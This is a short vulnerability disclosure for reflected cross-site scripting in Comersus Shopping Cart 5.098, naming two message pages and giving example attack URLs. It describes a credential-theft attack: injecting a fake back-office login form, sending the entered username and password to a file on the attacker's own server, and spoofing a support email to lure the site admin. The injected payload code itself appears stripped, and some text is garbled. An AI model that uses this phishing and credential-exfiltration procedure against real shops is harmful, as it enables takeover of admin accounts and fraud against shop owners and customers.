Comersus Shopping Cart 5.098 XSS Vulnerability ======================================================= Vulnerable Systems: * Comersus Cart Version 5.098 Comersus is an open source shopping cart.I found a few XSS Vulnerabilty : Pages Affected: /comersus/store/comersus_message.asp /comersus/backofficeLite/comersus_backoffice_message.asp Examples: http://www.target.net/comersus/store/comersus_message.asp?message=

VULNERABLE

http://www.target.net/comersus/backofficelite/comersus_backoffice_message.asp?message=

VULNERABLE

Try this : 1 Step : Create a file called comersus.php Next Step : Open url : http://www.target.net/comersus/backofficelite/comersus_backoffice_message.asp?message=

BackOffice%20Lite

User

Password

Enter user and password,then Submit After that, enter this url: http://mysite.org/comersus.txt This is a result(comersus.txt) : User:az001|Password:passwordnya| Sent a fake email from Comersus Site(support@comersus.com) to www.target.net admin (ex. admin@target.net): Hello admin@target.net blablablablabla ............................................... ................................................................ Please Login with username and password here and Wait until admin execute url